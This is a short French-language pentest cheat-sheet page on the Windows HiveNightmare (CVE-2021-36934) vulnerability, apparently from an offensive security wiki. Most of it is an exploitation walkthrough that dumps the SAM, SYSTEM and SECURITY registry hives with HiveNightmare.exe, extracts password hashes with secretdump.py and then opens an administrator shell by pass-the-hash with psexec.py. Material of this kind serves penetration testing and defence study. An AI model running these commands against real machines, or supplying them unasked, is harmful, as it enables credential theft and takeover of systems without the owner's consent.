🐝HiveNightmare
CVE-2021-36934 également connu sous le nom de vulnérabilité SeriousSAM et HiveNightmare a été découvert par Jonas Lykkegaard en juillet 2021. En raison d'une mauvaise configuration ACL dans Windows 10 post-build 1809 et Windows 11, les utilisateurs non administrateurs bénéficient d'un accès en lecture au trio sacré de Fichiers SAM, SYSTEM et SECURITY sous %windir%\system32\config. Pour que cela soit vrai, cependant, la protection du système doit être activée et un cliché instantané de volume doit être créé. Le nom « HiveNightmare » est dérivé d'un nom commun « hives » qui fait référence aux fichiers contenant des données de registre stockées.
Exploitation
Méthode 1 - Exploit C++
Sur la machine cible, télécharger HiveNightmare.exe dans le répertoire realease du dépôt github suivant:
Exécutez ensuite l'exécutable dans une fenêtre powershell.
>.\HiveNightmare.exe
Cela devrait créer 3 fichiers (SAM, SECURITY et SYSTEM) qu'il sera possible de consulter avec le script secretdump.py comme ceci:
$ python3 secretdump.py -system <SYSTEM file> -security <SECURITY file> -sam <SAM file> local
Il est alors possible d'ouvrir une session administrateur avec le hash de celui-ci:
$ python3 psexec.py -hashes <hash> administrator@<target IP> cmd.exe
Méthode 2 - serioussam.ps1 (exploit Powershell)
Méthode 3 - hive.exe (exploit Go)
Fonctionne de la même manière que l'exploit C++
Dernière mise à jour